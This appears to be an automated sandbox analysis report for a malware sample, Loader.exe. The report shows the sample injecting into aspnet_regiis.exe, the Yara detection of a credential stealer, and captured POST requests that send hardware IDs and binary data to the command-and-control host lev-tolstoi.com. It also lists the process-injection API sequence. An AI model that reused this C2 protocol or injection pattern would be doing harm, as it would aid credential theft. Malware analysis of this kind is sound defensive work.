                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=96qsjkrclavdv2bp19r20qljck; expires=Wed, 23 Apr 2025 14:51:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LWU6JwHgyD25t%2B5%2BXBgrAXuQ5sOz%2FXOQmxxM2l4Dvh2Cz11llsdTbgOfN0PUVXZtrbOJ0HH6Kpq1Ml2z5Zzg3nUHD9eIX8tYh9LnjskBHar9LvdGodNXnxoOHAa%2FccqoGFM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f9481e2e9957cf6-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2029&rtt_var=768&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15953&delivery_rate=1418164&cwnd=193&unsent_bytes=0&cid=352385b2103bf621&ts=869&x=0"
                                                                                                                                                                                                                                                                2024-12-28 21:05:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                2024-12-28 21:05:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                5192.168.2.549709172.67.157.2544435772C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-28 21:05:16 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=3A6GNRTMT0ED2APJYU3
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 20580
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-28 21:05:16 UTC15331OUTData Raw: 2d 2d 33 41 36 47 4e 52 54 4d 54 30 45 44 32 41 50 4a 59 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 44 39 31 38 45 43 30 35 43 44 46 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 33 41 36 47 4e 52 54 4d 54 30 45 44 32 41 50 4a 59 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 41 36 47 4e 52 54 4d 54 30 45 44 32 41 50 4a 59 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64
                                                                                                                                                                                                                                                                Data Ascii: --3A6GNRTMT0ED2APJYU3Content-Disposition: form-data; name="hwid"6A5D918EC05CDFE6BEBA0C6A975F1733--3A6GNRTMT0ED2APJYU3Content-Disposition: form-data; name="pid"3--3A6GNRTMT0ED2APJYU3Content-Disposition: form-data; name="lid"HpOoIh--5d
                                                                                                                                                                                                                                                                2024-12-28 21:05:16 UTC5249OUTData Raw: f5 b1 05 a9 66 42 b5 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: fBZ>56vMMZh'F3Wun 4F([:7s~X`nO
                                                                                                                                                                                                                                                                2024-12-28 21:05:17 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Sat, 28 Dec 2024 21:05:17 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=3nteptkoi1rod1id7e9n8hmtdm; expires=Wed, 23 Apr 2025 14:51:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2R6AM7SbSF1Hb7VcL2JRb7BOiqb9BN2J%2FYUasUvO7gHRalGcxHc4S9AainamSgVudMt35J3jShsm%2FW1bRuFAs%2BpX%2FwLMU0sCZhIuBNuX94Fixz5%2FbefrsSFtWD4au%2B5sxN4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f9481f17a98c342-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1640&rtt_var=631&sent=16&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21542&delivery_rate=1712609&cwnd=160&unsent_bytes=0&cid=e5e28032e505148d&ts=953&x=0"
                                                                                                                                                                                                                                                                2024-12-28 21:05:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                2024-12-28 21:05:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                6192.168.2.549710172.67.157.2544435772C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-28 21:05:19 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=0GFWAZ436VZL5S3QE3
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 1278
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-28 21:05:19 UTC1278OUTData Raw: 2d 2d 30 47 46 57 41 5a 34 33 36 56 5a 4c 35 53 33 51 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 44 39 31 38 45 43 30 35 43 44 46 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 30 47 46 57 41 5a 34 33 36 56 5a 4c 35 53 33 51 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 47 46 57 41 5a 34 33 36 56 5a 4c 35 53 33 51 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61
                                                                                                                                                                                                                                                                Data Ascii: --0GFWAZ436VZL5S3QE3Content-Disposition: form-data; name="hwid"6A5D918EC05CDFE6BEBA0C6A975F1733--0GFWAZ436VZL5S3QE3Content-Disposition: form-data; name="pid"1--0GFWAZ436VZL5S3QE3Content-Disposition: form-data; name="lid"HpOoIh--5defa
                                                                                                                                                                                                                                                                2024-12-28 21:05:20 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Sat, 28 Dec 2024 21:05:20 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=5ene8vh1n0ppvgh1fqd44al863; expires=Wed, 23 Apr 2025 14:51:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p8tT%2BHm%2Fd%2BW56eaw%2BdcCdkdbmvfttfdKov8f0uPcXAgk65gtVSZZkRa0BcoSnQZf9mym%2Br1gCypqzom%2BhbfVJYeoLGs04S7hrpaPtFn37jsKcpjPB2ycgmeQIwTHPIoeU0o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f948201993a1a03-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1926&min_rtt=1921&rtt_var=731&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2194&delivery_rate=1487519&cwnd=142&unsent_bytes=0&cid=f762422e01b4f7e6&ts=788&x=0"
                                                                                                                                                                                                                                                                2024-12-28 21:05:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                2024-12-28 21:05:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                7192.168.2.549713172.67.157.2544435772C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-28 21:05:21 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=LNSWTUQTFNJU1FQS
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 1121
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-28 21:05:21 UTC1121OUTData Raw: 2d 2d 4c 4e 53 57 54 55 51 54 46 4e 4a 55 31 46 51 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 44 39 31 38 45 43 30 35 43 44 46 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 4e 53 57 54 55 51 54 46 4e 4a 55 31 46 51 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 4e 53 57 54 55 51 54 46 4e 4a 55 31 46 51 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61
                                                                                                                                                                                                                                                                Data Ascii: --LNSWTUQTFNJU1FQSContent-Disposition: form-data; name="hwid"6A5D918EC05CDFE6BEBA0C6A975F1733--LNSWTUQTFNJU1FQSContent-Disposition: form-data; name="pid"1--LNSWTUQTFNJU1FQSContent-Disposition: form-data; name="lid"HpOoIh--5defa06fc6a
                                                                                                                                                                                                                                                                2024-12-28 21:05:22 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Sat, 28 Dec 2024 21:05:22 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=0diua00no84i94u4e5lmv8g9f1; expires=Wed, 23 Apr 2025 14:52:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KnTfXZpsrE2ZjJRBLhg8gobmfLRd948miEQsbizSQ9P4I9BkkKnYyW1bSYx9h0USUdIfEE3QQPhO1GYFQ6pHddgacBcCuGP1JypTf2bcR6r6Q9%2FpGME5pqlCmS5d1Onp09o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f94820f1f188c4b-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1956&rtt_var=748&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2035&delivery_rate=1447694&cwnd=232&unsent_bytes=0&cid=bb26e2db9e7b93f2&ts=820&x=0"
                                                                                                                                                                                                                                                                2024-12-28 21:05:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                2024-12-28 21:05:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                8192.168.2.549716172.67.157.2544435772C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-28 21:05:23 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 121
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-28 21:05:23 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61 62 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 36 41 35 44 39 31 38 45 43 30 35 43 44 46 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                                                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--5defa06fc6ab&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=6A5D918EC05CDFE6BEBA0C6A975F1733
                                                                                                                                                                                                                                                                2024-12-28 21:05:24 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Sat, 28 Dec 2024 21:05:24 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=6frn4p4kmdqtm7qrbmjuhe1h36; expires=Wed, 23 Apr 2025 14:52:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2TrhHM0%2B9rEf9donsocwF8w%2FC7mEsPIu9tItMKft8pKr%2Fdb%2F15ByAj%2FE1hogdZsj8VlxIpuQ5xAUEIC0EmpwFB08y%2B7M1uT%2FhZg0oNpEMudhZRUvhUAUnGfSHZr6v%2FMC%2Byo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f94821cfa0a0cb8-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1614&rtt_var=618&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1021&delivery_rate=1751649&cwnd=179&unsent_bytes=0&cid=d7d46a154e13e430&ts=923&x=0"
                                                                                                                                                                                                                                                                2024-12-28 21:05:24 UTC54INData Raw: 33 30 0d 0a 6f 6b 4a 36 38 35 71 45 54 50 56 67 52 46 6d 71 35 76 33 48 49 39 49 64 6c 51 32 4f 39 65 51 64 6e 4d 2f 41 34 71 55 6b 39 65 50 35 48 77 3d 3d 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 30okJ685qETPVgRFmq5v3HI9IdlQ2O9eQdnM/A4qUk9eP5Hw==
                                                                                                                                                                                                                                                                2024-12-28 21:05:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                Start time:16:05:00
                                                                                                                                                                                                                                                                Start date:28/12/2024
                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                                                                                                                                                                                Imagebase:0xb40000
                                                                                                                                                                                                                                                                File size:662'016 bytes
                                                                                                                                                                                                                                                                MD5 hash:2EC18B257662DD107AE84263ECD2E5C1
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                                Start time:16:05:00
                                                                                                                                                                                                                                                                Start date:28/12/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                Start time:16:05:01
                                                                                                                                                                                                                                                                Start date:28/12/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                                                                                                                                Imagebase:0x6d0000
                                                                                                                                                                                                                                                                File size:43'016 bytes
                                                                                                                                                                                                                                                                MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:8.7%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                  Signature Coverage:13.3%
                                                                                                                                                                                                                                                                  Total number of Nodes:1166
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:7
                                                                                                                                                                                                                                                                  execution_graph 12292 6ce11020 12298 6ce11081 12292->12298 12293 6ce11a69 12294 6ce4e890 _ValidateLocalCookies 5 API calls 12293->12294 12295 6ce11a7b 12294->12295 12296 6ce2f330 25 API calls 12296->12298 12297 6ce2ec60 26 API calls 12297->12298 12298->12293 12298->12296 12298->12297 12198 6ce28c20 12209 6ce28c40 std::bad_exception::bad_exception 12198->12209 12199 6ce2c950 NtReadVirtualMemory 12199->12209 12200 6ce2d2b4 NtSetContextThread NtResumeThread 12200->12209 12201 6ce2bc08 NtWriteVirtualMemory 12278 6ce27f20 12201->12278 12203 6ce2df6e NtAllocateVirtualMemory 12203->12209 12204 6ce2e4a9 NtWriteVirtualMemory 12204->12209 12205 6ce2e1d8 CloseHandle CloseHandle 12205->12209 12206 6ce2da9a NtWriteVirtualMemory 12206->12209 12207 6ce2a1d6 GetConsoleWindow ShowWindow 12242 6ce20470 12207->12242 12209->12199 12209->12200 12209->12201 12209->12203 12209->12204 12209->12205 12209->12206 12209->12207 12210 6ce20470 27 API calls 12209->12210 12212 6ce2de09 NtWriteVirtualMemory 12209->12212 12213 6ce2b6aa NtWriteVirtualMemory 12209->12213 12214 6ce2d9db NtWriteVirtualMemory 12209->12214 12215 6ce2ac76 CreateProcessW 12209->12215 12217 6ce2ce9f NtWriteVirtualMemory 12209->12217 12218 6ce2a8bc VirtualAlloc 12209->12218 12219 6ce2e352 NtReadVirtualMemory 12209->12219 12220 6ce2b1d6 NtWriteVirtualMemory 12209->12220 12221 6ce2dffe NtWriteVirtualMemory 12209->12221 12222 6ce2df23 NtAllocateVirtualMemory 12209->12222 12223 6ce2e2dc NtWriteVirtualMemory 12209->12223 12224 6ce2e18d NtSetContextThread NtResumeThread 12209->12224 12225 6ce2dbc7 NtReadVirtualMemory 12209->12225 12226 6ce2d5b3 12209->12226 12229 6ce2aec3 NtAllocateVirtualMemory 12209->12229 12230 6ce2adf4 NtGetContextThread 12209->12230 12231 6ce2d616 GetConsoleWindow ShowWindow 12209->12231 12235 6ce2e214 GetConsoleWindow ShowWindow 12209->12235 12238 6ce2d16c NtCreateThreadEx 12209->12238 12239 6ce2afeb NtAllocateVirtualMemory 12209->12239 12240 6ce2ca6a NtWriteVirtualMemory 12209->12240 12241 6ce2d460 CloseHandle CloseHandle 12209->12241 12270 6ce26e60 12209->12270 12282 6ce1ffa0 12209->12282 12210->12209 12212->12209 12213->12209 12214->12209 12215->12209 12217->12209 12218->12209 12219->12209 12220->12209 12221->12209 12222->12209 12223->12209 12224->12209 12225->12209 12227 6ce4e890 _ValidateLocalCookies 5 API calls 12226->12227 12228 6ce2d5bd 12227->12228 12229->12209 12230->12209 12232 6ce20470 27 API calls 12231->12232 12237 6ce2d643 12232->12237 12233 6ce20470 27 API calls 12233->12237 12234 6ce1ffa0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12234->12237 12236 6ce20470 27 API calls 12235->12236 12236->12237 12237->12209 12237->12233 12237->12234 12238->12209 12239->12209 12240->12209 12241->12209 12248 6ce20499 ___scrt_uninitialize_crt 